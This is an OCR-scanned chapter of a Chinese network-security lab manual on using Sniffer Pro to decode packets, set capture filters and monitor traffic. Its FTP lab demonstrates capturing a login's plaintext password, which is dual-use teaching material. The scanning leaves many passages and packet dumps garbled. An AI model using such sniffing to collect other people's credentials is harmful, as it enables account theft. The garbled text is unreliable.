单 击 专家 系统 下 方 的 “解码 ”按钮 ,就 可 以 对 具体 的 记录 进行 解码 分 析 , 如 图 3. 26 所 
示 。 页 面 自 上 而 下 由 三 部 分 组 成 : 捕获 的 报 文 .解码 后 的 内 容 、 解 码 后 的 二 进 制 编码 
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图 3 报 文 详细 信息 
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4 115.3 146] [22227 .254.174|TCP: D=2815 9-443  ACK=4166184381 SEQ=2741383 | 0:00:00.000| 0.000.030 
2 27 254.174 [124 115.3 146] TCP. 0-443 S-2815  — ACK-2748363691 VIN«655:60 | 0:00:00 .000| О 000.045 
1.14.97 .178] (222.27, 254.174 ТСР 20 9-443 АС 24 330/140 | 0:00:00. 049 0.043.786 
[222.27 254.174 [121.14.97.178]|TCP. D«443 5+2820 (60 | 0:00:00 156) 0 106.361 


Source port = 443 (Https) 
Destination port = 2815 
Sequence nunber = 2748361914 
Next expected Seq numbers 2748363362 
Acknovledgment number = 4166184381 


Data offset * 20 bytes 
Reserved Bits: Reserved for Future Use (Not shovn in the Hex Dump) 
Flags = 10 
= (No urgent pointer) 
= Àcknovledgxent 
* (No push) 
* (No reset) 
(No SYN) 
(No FIN) 
Window 6432 
Checksum = SB40 (correct) 
Urgent pointer -0 
No TCP options 
[1448 Bytes of data] 


(0000000000 16 76 74 le 31 00 бї eZ S£ 3c бс 08 00 45 00 ^ 
00000010. 08 40 fa 3a 40 00 2f 06 ee bd 7c 73 03 92 de 1b E Е 
|00000020: fe ae 
(00000030 ГА 
|00000040 
0 E 
) Protocol Ost.) 


图 3 和 5 报 文 解码 


对 于 解码 分 析 人 员 来 说 ,只 有 充分 掌握 各 类 网 络 协议 ,才能 看 懂 解 析出 来 的 报 文 。 利 
用 软件 解码 分 析 来 解决 问题 的 关键 是 要 对 各 种 层次 的 协议 有 充分 的 了 解 。 

4. 统计 分 析 

对 于 各 种 报 文 信息 ,专家 系统 提供 了 和 矩阵 (matrix) 分 析 ( 如 图 3. 27 所 示 )、 主 机 列表 
Chost table) 分 析 ( 如 图 3. 28 所 示 ) ,协议 统计 (protocol dist) 分 析 ( 如 图 3. 29 所 示 ) 以 及 会 
话 统 计 (statistics) 分 析 ( 如 图 3. 30 所 示 ) 等 多 种 统计 分 析 功 能 ,可 以 按照 MAC 地 址 、IP 
地 址 ,协议 类 型 等 内 容 进行 多 种 组 合 分 析 。 
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图 32 协议 统计 分 析 图 330 会 话 统计 分 析 


5. 捕获 条 件 设置 

在 Sniffer 环境 下 ,可 以 通过 “定义 ”的 方式 来 对 捕获 条 件 进行 设置 ,获得 用 户 需 要 的 
报 文 协议 信息 。 基 本 的 捕获 条 件 有 两 种 。 

(1) 链 路 层 捕获 : 按照 源 MAC 地 址 和 目的 МАС 地址 设 定 捕 获 条 件 , 输 入 方式 为 十 
六 进 制 MAC 地 址 ,如 000D98ABCDFE。 

(2) IP 层 捕获 : 按照 源 IP 地 址 和 目的 TP 地 址 设 定 捕获 条 件 。 输 入 方式 为 IP 地 址 ， 
如 192. 168. 1. 157。 特 别 注意 的 是 ,如 果 选 择 IP 层 捕获 方式 , 则 ARP 等 类 型 的 报 文 信息 
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用 户 可 以 通过 单 击 快捷 面板 上 的 车 | 按钮 ,或 选择 "捕获 ?菜单 下 的 “定义 过 滤器 "来 设 
定 捕获 条 件 , 如 图 3. 31 所 示 。 


EM 
RE ”| 地 址 | 数据 模式 | 高 级 |@Ф | 


=] 
缓冲 器 大 小 : 8 Mec FB 
缓冲 器 动作 : TES (гар) 


图 331 过 滤器 操作 界面 


过 滤器 主要 包括 摘要 、 地 址 、 数 据 模式 .高 级 .缓冲 五 个 操作 界面 。 

。 摘要 操作 界面 显示 了 当前 缓冲 器 的 设 定 情况 。 

。 地 址 操作 界面 用 来 进行 缓冲 器 捕获 条 件 的 设 定 , 如 图 3. 32 所 示 。 
Ж Mites 

mmo dE | 数据 模式 | 高 级 | aie | 


A32 捕获 条 件 定义 界面 


。 数据 模式 操作 界面 用 来 编辑 捕获 条 件 。 

。 高 级 选项 界面 用 来 设 定 捕获 的 协议 .数据 包 类 型 .数据 包 大 小 等 信息 。 

。 缓冲 操作 界面 用 来 对 缓冲 区 进行 详细 配置 。 

在 “高 级 ”页 面 下 ,可 以 更 加 详细 地 配置 捕获 条 件 , 如 选择 需要 捕获 的 协议 条 件数 据 
包 具 体 长 度 、 数 据 包 类 型 等 。 在 保存 过 滤 规 则 条 件 “ 配 置 文件 (Profiles)” 时 ,可 以 对 当前 
设置 的 过 滤 规 则 进行 保存 ,在 捕获 面板 中 ,可 以 选择 保存 的 捕获 条 件 轿 到 

在 “数据 模式 ”页 面 下 ,可 以 编辑 更 加 详细 的 捕获 条 件 ,如 图 3. 33 所 示 。 mm 
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式 的 方式 可 以 实现 复杂 报 文 过滤 ,但 同时 增加 了 捕获 的 时 间 复 杂 度 。 


ee HR 


RE | 地 址 е јал ue | 为 设置 


添加 关系 节点 | | 模板 关系 控制 | | жуш 
3 


naw/og | SERD | gpe wor | фт 
增加 模式 | deme | ARIE OF | 赋值 四 


wis | Roser... | 


图 33 捕获 条 件 详细 配置 界面 


实验 报告 要 求 

。 实验 目的 。 

* 附 上 实验 过 程 的 截图 和 结果 截图 。 

* 阐述 碰 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 

3.2.4 网 络 监视 实验 

实验 器 材 

。 Sniffer Pro 软件 系统 1 套 。 

e PC(Windows XP/Windows 7)1 #. 
预习 要 求 

。 做 好 实验 预习 ,复习 网 络 协议 有 关内 容 。 
* 复习 Sniffer 软件 数据 捕获 功能 的 操作 方法 。 
。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 


通过 本 实验 ,熟练 掌握 Sniffer 的 各 项 网 络 监视 模块 的 使 用 ; 熟练 运用 网 络 监视 功 


能 ,撰写 网 络 动态 运行 报告 。 


实验 环境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 
预备 知识 


* TCP/IP 原理 及 基本 协议 。 
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。 路 由 技术 及 实现 方式 。 

实验 步骤 

单 击 “ 监 视 器 ”菜单 或 快捷 操作 界面 ,可 依次 看 到 如 下 监视 功能 : 仪表 板 、 主 机 列表 、 
矩阵. 请求 响 应 时 间 .历史 取样 .协议 分 析 、 全 局 统计 表 、 和 警报 日 志 等 。 

1. 仪表 板 (dashboard) 

单 击 快捷 操作 菜单 上 的 图 标 人 到, 即 可 弹出 仪表 板 。 在 仪表 板 上 方 ,可 对 监视 行为 进 
行 具体 配置 ,并 对 监视 内 容 进行 重 置 。 如 图 З. 34 所 示 , 网 络 监 视 仪表 盘 包 括 三 个 仪表 : 
第 一 个 仪表 显示 的 是 网 络 使 用 率 (Utilization) ;第 二 个 仪表 显示 的 是 网 络 每 秒 钟 通过 的 
包 数 量 (Packets) ;第 三 个 仪表 显示 的 是 网 络 的 每 秒 错误 率 (Errors) 。 


图 334 网 络 监视 仪表 信息 


下 面 两 组 数字 ,前 面 表示 当前 值 ,后 面 表示 最 大 值 。 通 过 三 个 仪表 可 以 直观 地 观察 到 
网 络 的 使 用 情况 ,仪表 的 红色 区 域 是 警戒 区 域 ,如果 发 现 有 指针 到 了 红色 区 域 就 该 引起 一 
定 的 重视 了 ,说 明 网 络 线路 不 好 或 者 网 络 负荷 太 大 。 如 果 需 要 获得 更 为 详细 的 网 络 整体 
使 用 情况 ,可 以 单 击 “ 细 节 ” 按 钮 ,查看 数据 统计 结果 。 

如 图 3. 35 所 示 ,Drops 表示 网 络 中 遗失 的 数据 包 数 量 (在 网 络 活动 高 峰 期 经 常会 遗 
失 数 据 包 ) ,过 多 的 广播 会 使 网 络 上 所 有 系统 的 性 能 整体 下 降 。 在 粒度 分 析 表 格 中 列 出 了 
网 络 中 数据 包 的 分 布 状态 ,包括 64B、65-127B、128-255B 等 不 同 字 节 的 数据 包 总 数 。 错 误 
描述 表格 中 列 出 了 错误 出 现 率 ,也 就 是 Errors/s。 


图 335 网 络 监视 详细 信息 


通过 三 个 仪表 盘 , 可 以 很 容易 地 看 到 从 捕获 开始 ,有 多 少数 据 包 经 过 网 络 ,有 多 少 帧 
被 过 滤 , 以 及 遗失 了 多 少 帧 等 情况 .还 可 以 看 到 网 络 的 利用 率 、 数 据 包 数目 和 广播 数 ,如 果 
发 现 网 络 在 每 天 的 特定 时 间 都 会 收 到 大 量 的 组 播 数据 包 , 就 说 明 网 络 可 能 出 现 了 问题 , 需 
及 时 分 析 哪 个 应 用 程序 在 发 送 组 播 数据 包 。 
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Sniffer 的 很 多 网 络 分 析 结 果 都 可 以 设 定 阔 值 , 若 超出 阔 值 ,报警 记录 就 会 生成 一 条 信 


EB ,并 在 


仪表 盘 上 以 红色 来 标记 阔 值 的 警告 值 。 网 络 管理 员 应 记录 下 警告 信息 ,并 且 查 看 系 


统 超过 了 值 多 少 次 ,以 及 超出 阔 值 的 频率 是 多 少 ,这 些 信息 有 助 于 确定 网 络 是 否 有 问题 。 


fad 
框 , 即 可 


片 仪 表盘 上 的 Set Thresholds 4 7E H 1E) tk 4H . FJ IF Dashboard Properties Xf i 
根据 自己 的 网 络 状 况 来 配置 仪表 阅 值 ,以 保证 仪表 能 准确 地 显示 网 络 情况 。 


如 图 3. 36 所 示 ,可 以 在 仪表 盘 的 下 方 查看 网 络 监 视 曲 线 图 ,主要 包括 网 络 运行 错误 
率 和 粒度 分 布 三 种 情况 。Long Term 每 30 分 钟 采样 一 次 ,一共 可 以 采样 24 小 时 ;Short 
Term 每 30 秒 采 样 一 次 ,可 以 采样 25 分 钟 。 


оо 2010#6Я21Н 16:16:07 ("Short Term С 


16:26:37 16:39:07 


16:26:37 16:39:07 


16:26:37 16:39:07 


图 335 网 络 监视 曲线 图 


2. 主机 列表 (host table) 

单 击 快捷 操作 菜单 上 的 图 标量. 或 选择 “监视 器 ?菜单 内 的 “主机 列表 ”选项 ,界面 中 
显示 的 是 所 有 在 线 的 本 网 主机 地 址 以 及 外 网 服务 器 地 址 信息 ,可 以 分 别 选择 MAC 地 址 、 
IP 地 址 以 及 IPX 地 址 。 通 常情 况 下 ,网络 中 所 有 终端 的 对 外 数据 ,如 浏览 网 站 、 上 传 下 载 
等 行为 都 是 各 终端 与 网 关 在 数据 链 路 层 中 进行 的 ,因为 需要 查看 MAC 地 址 的 连接 情况 。 
通过 主机 列表 ,可 以 直观 地 看 到 流量 最 大 的 前 十 位 主机 地 址 。 

在 查看 网 络 主机 信息 时 ,默认 以 MAC 地 址 形式 显示 网 络 中 的 计算 机 。 如 果 计 算 机 
处 于 局 域 网 中 ,可 以 清楚 地 显示 计算 机 的 MAC 地 址 ;但 如 果 计 算 机 处 于 Internet 中 , 则 
不 能 获得 计算 机 的 MAC 地 址 ,此 时 以 IP 地 址 形式 显示 。 单 击 窗口 下 方 的 IP 标 签 , 即 可 
显示 计算 机 的 IP 地 址 ,这 样 可 以 更 清楚 地 查看 到 各 台 计 算 机 。 

在 列表 中 ,可 以 通过 单 击 “ 广 播 ” 或 “多 点 传送 ”对 广播 量 进行 统计 。IP 的 广播 有 三 
fh. 255.255.255. 255 叫 本 地 广播 ;192. 168. 255. 255 叫 子 网 广播 ;192. 168. 1. 255 叫 全 
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子 网 广播 。 

为 了 方便 查看 连接 地 址 信息 ,设置 了 细节 、 饼 状 图 .柱状 图 等 统计 方 
查看 输出、 条 件 过 滤 等 多 种 选项 。 在 统计 分 析 的 柱 形 图 与 饼 图 中 ,网 关 
当 发 现 某 个 网 关 流量 与 其 
络 流量 的 操作 。 如 果 发 现 某 各 
可 能 存在 网 络 异 常 。 

当选 中 某 台 主机 时 ,可 以 通过 “条 件 过 滤 ” 设 置 过 
器 。 在 流量 分 析 过 程 中 ,根据 包 结构 取得 主机 信息 ， 


?计算 机 在 某 个 时 间 段 


条 件 , 系 统 
即 目 的 MAC 


IP。 为 了 查看 更 为 详细 的 主机 交互 情况 ,可 以 单 击 列表 中 的 任意 项 ,如 图 : 


自动 产生 


式 以 及 单 向 地 址 


流 E 
DIL E 


量 依次 减 小 。 


+ 他 终端 流量 差距 悬殊 时 , 则 需要 重点 检查 目标 主机 是 否 有 大 网 
送 或 接收 了 大 量 数据 , 则 说 


明 其 


-个 新 的 过 滤 
ИЙ MAC 或 目的 TP 
37 所 示 , 单 击 


IP 地 址 为 "114. 80. 93. 60” 的 列表 项 , 则 可 以 显示 由 “114. 80. 93. 60” 主 机 发 送 或 接收 的 数 
a ЕЕ У D D 中 二 之 
据 包 情况 ,如 图 3. 38 Aras. 
TREE MES п ЖЕР ГИ BELL TERME y Tabbers q= [EF [ЖЮ jJ 
E о *-0m29 3 d о ро о 3d d о у o? 
| E i ; i i | E 3 3 
ә 3 § Е 
E onl E : : H : ; Д 4 
FS E | i : il | ; i И 
Lu ei 1 | э H Ц Ц Н 3 
x n 1 0 0 0 0 1] i] n 
ү: 0 26 @ D 0 0 D 0 0 
图 % É E ; ‘l : ; 3 H 
IET ч ie 4 1 1 1 9 2 
Н i j 3 
0180C200000A 0 D 0 
10200447 4Р50 0 D 0 
п 
п 
Й 


图 37 主机 列表 


传输 地 图 为 了 114.80.93.60 


138 单机 连接 情况 
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3. Ж Ё (matrix) 
PPL PR GE Be E SEHR. AY РЕ. ER ve PE" M ML n SEY “BE” ET, пр DA fo 2 
网 的 所 有 连接 情况 , 即 主机 会 话 情况 。 

如 图 3. 39 所 示 ,处 于 活动 状态 的 网 络 连接 被 标记 为 绿色 ,已 发 生 的 网 络 连接 被 标记 
为 蓝 色 ,线条 的 粗细 与 流量 的 大 小 成 正比 ,将 鼠标 移动 至 线条 处 ,会 显示 流量 双方 位 置 . 通 
信 流 量 大 小 以 及 流量 占 当 前 网 络 的 百分比 。 


图 33 全 网 连接 矩阵 


* 对 于 LAN ,可 以 分 析 MAC EIP 网 络 层 、IP 应 用 层 、IPX 网 络 层 和 IPX 传输 层 。 

。 对 于 WAN, 可 以 分 析 链 路 层 IP 网 络 层 IP 应 用 层 IPX 网 络 层 和 IPX 传输 层 。 

ЖП DA а Sniffer 中 最 常用 的 功能 , 它 以 矩阵 方式 列 出 当前 网 络 中 的 连接 情况 ， 
用 户 可 以 清楚 地 看 到 某 个 计算 机 正在 与 哪些 地 址 进行 连接 。 

“通信 量 图 ”可 以 显示 节点 间 网 络 通信 量 的 全 面 信息 ,而 且 可 以 查看 特定 网 络 节点 
信息 。 

“大 纲 ” 简 要 汇总 了 每 对 网 络 节点 间 发 送 的 总 字 节 数 和 总 报 文 数 ,可 以 查看 独立 网 络 
连接 的 数据 包 使 用 情况 ,也 可 以 右 击 独立 的 IP 终端 节点 ,如 果 连 接 数 目 非 常 大 ,显然 不 是 
-种 正常 的 业务 连接 ,此 时 需要 认真 检查 每 一 个 连接 的 会 话 情 况 。 

如 图 3. 40 所 示 ,细节 可 以 按 高 层 协议 分 类 情况 查看 网 络 连接 及 数据 包 使 用 情况 。 此 
外 ,柱状 图 以 及 饼 图 都 能 够 实时 显示 网 络 利用 率 меа 话 。 利 用 矩阵 监 
视 器 可 以 评估 网 络 运行 状况 和 流量 异常 ,特别 适合 用 来 检测 病 

对 于 未 知 协议 ,可 以 通过 选择 “工具 ”菜单 的 “ ига" 协议 ? 栏 进行 自 定 义 ,为 
某 端口 指定 协议 名 称 , 以 便 更 好 地 检测 网 络 流量 。 

通过 和 矩阵 功能 可 以 发 现 网 络 中 使 用 BT 等 P2P 软件 或 中 了 蠕虫 病毒 的 用 户 。 如 果 某 
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2222725261 |10 1733 |1266 10 118.228.148.67 
2222725468 |22 2905 (12022 21 218.50.35.111 
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6 820 2274 6 202.108.25337 
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азо 不 同 网 络 协议 的 网 络 连接 情况 


个 用 户 的 并 发 连接 数 特别 多 ,并 且 在 不 断 地 向 其 他 计算 机 发 送 数据 ,这 就 说 明 该 计算 机 很 
可 能 中 了 蠕虫 等 病毒 。 此 时 ,网络 管 理 员 应 及 时 封 掉 该 计算 机 所 连接 的 交换 机 端口 ,并 对 
该 计算 机 查 杀 病毒 。 

4. 请 求 响应 时 间 (application response time. ART) 

请 求 响应 时 间 用 来 显示 网 络 中 Web 网 站 的 连接 情况 ,可 以 看 到 局 域 网 中 有 哪些 计算 
机 正在 上 网 ,浏览 的 是 哪些 网 站 等 。 该 窗口 中 显示 了 局 域 网 内 的 通信 及 数据 传输 大 小 ,并 
且 显 示 了 本 地 计算 机 与 Web 网 站 的 IP 地 址 。 通 过 单 击 左 侧 工具 栏 中 的 图 标 ,以 柱 形 图 
方式 显示 网 络 中 计算 机 的 数据 传输 情况 ,不同 顺 序 图 柱 代表 右 侧 列表 中 的 相应 连接 , 柱 形 
长 短 表 示 传 输 量 的 大 小 。 

ART 是 指 一 个 客户 端 发 出 一 个 请 求 , 到 服务 器 响应 回来 的 时 间 差 。 一 般 来 说 ,应 用 
响应 的 快慢 是 应 用 性 能 的 一 个 重要 指标 。 应 用 性 能 主要 取决 于 几 个 因素 : 网 络 因素 、 服 
务 器 因素 .客户 端 因素 .应 用 协议 因素 。 

如 果 一 个 数据 包 的 目的 IP 是 192. 168.1.1, 目 的 端口 是 80, 那 么 就 可 以 认定 
192.168. 1. 1 Æ Нир 服务 器 地 址 ,而 源 IP 就 是 客户 地 址 ,主要 列表 项 含义 如 图 3. 41 所 示 。 
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。 AvgRsp: 平均 响应 时 间 。 

* 90%Rsp: 90% 响 应 时 间 , 去 掉头 尾 各 5%。 

* MinRsp/MaxRsp: 最 大 /最 小 的 响应 时 间 , 以 毫秒 为 单位 。 

。 TotalRsp: 响应 次 数 。 

接 下 来 各 列 为 0~25ms 的 响应 次 数 ,25 一 50ms 的 响应 次 数 等 。 

通过 单 击 左 侧 的 “属性 ?项 , 自 定义 所 要 监视 的 网 络 协议 。 当 协议 不 存在 时 ,可 以 利用 
对 应 端口 号 在 “工具 ”菜单 的 “选项 ”对 话 框 下 添加 协议 。 

利用 应 用 响应 时 间 的 监视 功能 ,可 以 快速 获得 某 一 业务 的 响应 时 间 。 首 先 获得 业务 
源 地 址 的 服务 器 /客户 端 响应 时 间 ( 网 络 消耗 时 间 ) 和 服务 器 处 理 时 间 ; 同 时 ,在 业务 的 目 
的 地 址 获得 服务 器 处 理 时 间 ,利用 Sniffer 可 以 判断 影响 业务 性 能 的 因素 是 来 自 网 络 还 是 
服务 器 。 通 过 长 期 的 观测 ,还 可 以 设 定 每 一 个 业务 的 响应 基准 线 , 以 此 判断 业务 运行 是 否 
正常 。 

5. 历史 取样 (history oe 

历史 取样 用 来 收集 一 段 时 间 内 的 各 种 网 络 流量 信息 。 通 过 这 些 信息 可 以 建立 网 络 运 
行 状态 基线 ,设置 网 络 异 常 的 报警 阔 值 。 默 认 情 况 下 ,历史 采样 的 缓冲 有 3600 个 采样 点 ， 
每 隔 15 秒 进行 一 次 采样 ,采样 15 个 小 时 后 自动 停止 。 如 果 想 延长 采样 时 间 ,可 以 通过 修 
改 采 样 间 隔 时 间或 者 设置 缓冲 区 属性 的 方式 。 具 体 做 法 是 : 单 击 左 侧 的 “属性 ”按钮 , 修 
改 采样 间隔 ,并 选中 “ 当 缓 冲 区 满 时 覆盖 ”选项 。 此 外 ,还 可 以 灵活 地 选择 多 种 采样 项 目 。 

6. 协议 分 布 (protocol distribution) 

协议 分 布 用 来 分 析 网 络 中 不 同 协 议 的 使 用 情况 。 通 过 协议 分 布 功能 可 以 直观 地 看 到 
当前 网 络 流量 中 的 协议 分 布 情况 ,了 解 各 类 网 络 协议 的 分 布 情况 以 后 ,可 以 找到 网 络 中 流 
量 最 大 的 主机 ,这 意味 着 该 主机 对 网 络 的 影响 最 大 ,之 后 可 以 利用 主机 列表 的 饼 视 图 功能 
找到 流量 最 大 的 机 器 。 

7. 全 局 统计 表 

全 局 统计 数据 能 够 显示 网 络 的 总 体 活 动情 况 ,并 确认 各 类 数据 包 通 信和 负载 大 小 ,从 而 
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分 析 网 络 的 总 体 性 能 及 存在 的 问题 。 全 局 统计 表 提 供 了 与 网 络 流量 相关 的 各 类 统计 测量 
FX. 

* 粒度 分 布 : 根据 数据 包 大 小 与 监测 到 的 通信 总 量 之 比 ,显示 每 个 数据 包 的 发 生 

频率 。 

。 利用 率 分 布 : 以 10% 为 基本 度量 单位 ,显示 每 组 空间 内 网 络 带 宽 的 分 布 情况 。 

8. 警报 日 志 

全 面 监测 和 记录 网 络 异 常事 件 。 一 旦 超过 用 户 设 定 的 阔 值 参数 ,警报 器 会 在 警报 日 
志 中 记录 相应 事件 。 警 报 分 为 五 种 不 同 程度 的 严重 性 级 别 : 严重 、 重 要 ,次 要 ,警告 和 通 
知 。 对 于 警报 日 志 中 的 每 个 警报 事件 ,都 可 以 观察 触发 警报 的 具体 节点 类 型 .发 生 时 间 、 
警报 级 别 以 及 描述 信息 等 。 系 统 默认 的 警报 级 别 如 表 З. 3 所 示 。 


表 3.3 系统 默认 警报 级 别 


事件 级 别 事件 级 别 
Bii o ЕШ 严重 地 址 簿 内 数据 重复 通知 
IP 地 址 重复 严重 探测 位 置 不 响应 次 要 


选择 “工具 ”菜单 中 的 “选项 ”, 单 击 “ 警 报 ” 选 项 卡 , 选 择 “ 定 义 强度 ...”, 可 以 修改 警报 
强度 ,如 图 3. 42 所 示 。 和 警报 可 以 设 定 为 声音 、 电 子 邮 件 、 拨 呼叫 器 以 及 警报 文本 四 类 。 


图 342 警报 级 别 调整 界面 


同时 ,可 以 对 专家 系统 的 实时 分 析 数 据 设 定 警报 级 别 。 选 择 “ 工 具 ” 下 的 “专家 系统 ” 
选项 , 单 击 “警报 ”选项 卡 , 将 设 定 好 严重 性 级 别 的 各 类 系统 层 项 目的 “记录 警报 ”选项 设 定 
为 “是 ”。 在 正常 运行 过 程 中 ,选中 “警报 ”选项 卡 上 的 “启用 新 警报 ” 复 选 框 即 可 。 

实验 报告 要 求 

。 实验 目的 。 

+ 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 碰 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 
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3.3 扩展 实验 


为 了 对 Sniffer Pro 的 使 用 有 一 个 更 加 综合 和 全 面 的 了 解 ,设计 了 网 络 协议 嗅 探 和 协 
议 抓 包 分 析 两 个 综合 型 实验 。 


3.3.1 网 络 协议 嗅 探 


实验 器 材 
。 Sniffer Pro 软件 系统 1 套 。 
* PC(Windows XP/Windows 7)1 #7. 
预习 要 求 
。 做 好 实验 预习 ,复习 网 络 协 议 有 关内 容 。 
。 复习 Sniffer 软件 的 操作 方法 。 
。 做 好 预习 报告 。 
实验 任务 
通过 本 实验 ,理解 常用 Sniffer 工具 的 配置 方法 ,明确 多 数 相 关 协 议 的 明文 传输 问题 ， 
理解 TCP/IP 主要 协议 的 报头 结构 ,掌握 TCP/IP 网 络 的 安全 风险 。 
实验 环境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 
预备 知识 
* TCP/IP 原理 及 基本 协议 。 
。 FTP 站 点 搭建 技术 及 基本 协议 。 
УТ 
1. 开启 Sniffer Pro 
具体 操作 步骤 略 。 
2. 捕获 数据 包 前 的 准备 工作 
在 默认 情况 下 ,Sniffer 将 捕获 其 接 和 网络 中 的 所 有 数据 包 , 但 在 某 些 场景 下 ,有 些 数 
据 包 可 能 不 是 我 们 所 需要 的 ,为 了 快速 定位 网 络 问题 所 在 ,有 必要 对 所 要 捕获 的 数据 包 进 
行 过 滤 。 可 以 通过 过 滤器 ,定义 Sniffer 捕获 数据 包 的 过 滤 规 则 ,过 滤 规 则 包括 网 络 地 址 
的 定义 和 几 百 种 协议 的 定义 。 定 义 过 滤 规 则 的 做 法 如 下 : 
在 主 界面 选择 “捕获 ”菜单 中 的 “定义 过 滤器 ”选项 ,如 图 3. 43 所 示 。 
其 中 ,“ 地 址 ”选项 卡 是 最 常用 的 过 滤 手 段 ,包括 MAC 地 址 、IP 地 址 和 IPX 地 址 的 过 
滤 定义 。 以 定义 IP 地 址 过 滤 为 例 , 如 图 3. 44 所 示 。 


当 需 要 捕获 地 址 为 192. 168. 1. 224 的 主机 与 其 他 主机 数据 通信 时 ,需要 首先 确定 “地 
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址 类 型 ”为 “IP”,“ 模 式 ” 为 “包含 ”, 若 选择 “排除 ”, 则 表示 捕获 条 件 为 除 本 主机 以 外 的 所 有 
数据 通信 。 在 下 方 的 位 置 选项 中 ,在 左右 任意 一 侧 填 写 好 主机 地 址 , 即 *192. 168. 1. 224”, 
而 另 一 侧 可 填写 "any”, 完 成 通信 地 址 定义 。 

。 国人 二 贺 表 示 由 被 测 主机 发 出 和 接收 的 所 有 数据 包 。 

EM 一 加 表示 由 被 测 主机 发 送 的 数据 包 。 

• 加 二 加 表示 由 被 测 主机 接收 的 数据 包 。 

在 完成 上 述 设置 后 ,要 按照 需要 捕获 的 数据 包 类 型 选择 可 用 协议 ,如 HTTP, DNS 
等 ,需要 特别 注意 的 是 ,DNS、NETBIOS 的 数据 包 有 些 是 属于 UDP 协议 ,因此 ,需要 在 
UDP 选项 卡 中 进行 类 似 ТСР 选项 卡 的 选择 工作 ,否则 捕获 的 数据 包 将 不 完整 。 

在 “高 级 ”设置 栏目 内 ,可 以 定义 数据 包 大 小 (68 一 128B) .缓冲 区 大 小 以 及 文件 存放 
位 置 等 ,具体 内 容 如 图 3. 45 所 示 。 

3. 捕获 数据 协议 

将 定义 好 的 过 滤器 应 用 于 捕获 操作 中 。 启 动 * 捕 获 ” 功 能 ,就 可 以 运用 各 种 网 络 监控 
功能 分 析 网 络 数据 流量 及 各 种 数据 包 具 体 情况 。 
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实验 报告 要 求 

: 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阅 述 收获 与 体会 。 


3.3.2 FIP 协议 分 析 


实验 器 材 
。 Sniffer Pro 软件 系统 1 套 。 
* PC( Windows XP/Windows 7)1 台 。 


预习 要 求 

。 做 好 实验 预习 ,复习 网 络 协议 有 关内 容 。 

* 复习 Sniffer 软件 的 操作 方法 。 

+ 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 

通过 本 实验 ,掌握 利用 Sniffer 软件 捕获 和 分 析 网 络 协议 的 具体 方法 。 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 
系统 。 

预备 知识 

* FTP 原理 及 基本 协议 。 

”网 络 协议 分 析 技术 的 综合 运用 。 
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实验 步 又 
按照 实际 需要 ,定义 如 图 3. 46 所 示 的 过 滤器 ,并 应 用 该 过 滤器 捕获 FTP 协议 信息 。 
运行 数据 包 捕获 功能 。 


日 地 址 


as 
125, 223. 124.124 一 -> 任意 的 
日 高 级 的 
协议 : IEEES02.11, ТСР, UDP, IPX, OSI 


Гл 
EIC ZUGE 字 节 
ЗЕЕ: PRÉ rap) 


BE юн | 配置 文 件 
图 346 定义 过 滤器 


在 Sniffer 捕获 状态 下 ,进行 FTP 站 点 操作 。 如 图 3. 47 Bros ,登录 FTP 站 点 ,位 置 
信息 为 “ftp. hrbeu. edu. cn”, 用 户 名 和 密码 均 为 匿名 (anonymous)。 看 到 系统 登录 成 功 的 


提示 后 ,用 户 可 以 进行 自 定义 操作 ,对 FTP 站 点 和 文件 进行 操作 ， 
ВЯ C\Windows\system32\emd exe - ftp ftp.hrbeu.edu.cn 2318 


A347 ”FIP 命 令 行 登录 界面 


通过 单 击 “捕获 停止 ?或 者 "停止 并 显示 ?按钮 停止 Sniffer 捕获 操作 ,并 对 捕获 的 数据 
包 进 行 解码 和 显示 。 如 图 3. 48 所 示 ,通过 对 报 文 解析 ,可 以 看 到 Sniffer 捕获 到 了 用 户 登 
Ж FTP 的 用 户 名 和 明文 密码 ,对 于 用 户 进行 的 若干 FTP 站 点 操作 行为 ,Sniffer 都 能 够 捕 
获 到 相关 信息 。 

实验 报告 要 求 

。 实验 目的 。 


Nn 
~ 
. 


5=54453 SYN SEQ=1179230683 LEN-0 W 
ACK=2674058857 WIN-819 
ACK=2674058877 WIN-817 

ISER 


ACK-2674058911 


ÀCK-2674058934 VIN-811 
PORT 125.223.124, 
s LIST 
D-20 5-54454 SYN ACK-2680643451 
D=20 S-54454 ACK=2680644594 
D-21 5-54453 ACK=2674059048 
D=20 S-54454 FIN ACK=2680644594 
: D«8000 S-4000 IEN=55 (missing data?) 
D-49777 S-1900 LEN-479 (missing data?) 
i D=49777 S-1900 IEN-473 (missing data?) 


= 54453 (Dynamic and/or Private) 
Destination port = 21 (FTP-ctzl) 
Sequence nunber - 1179230700 
Next expected Seq number- 1179230716 

00 19 c6 00 60 ad 00 Od Se 8c 98 68 08 00 45 00 


00 38 61 bi 40 00 80 06 00 00 7d df 7c 7c са 76 Ваз с «я ЕЯ 


+ 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


3.3.3 Telnet 协议 分 析 

实验 器 材 

。 Sniffer Pro 软件 系统 1 套 。 

* PC( Windows XP/Windows 7)1 #. 


预习 要 求 

做 好 实验 预习 ,复习 网 络 协议 有 关内 容 。 
复习 Sniffer 软件 的 操作 方法 。 

做 好 预习 报告 。 


实验 任务 
通过 本 实验 ,掌握 利用 Sniffer 软件 捕获 和 分 析 网 络 协议 的 具体 方法 。 


实验 环境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 
系统 。 
预备 知识 
* Telnet 原理 及 基本 协议 。 
。 网 络 协议 分 析 技 术 的 综合 运用 。 
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按照 实际 需要 ,定义 如 图 3. 49 所 示 的 过 滤器 ,并 应 用 该 过 滤器 捕获 Telnet 协议 信 
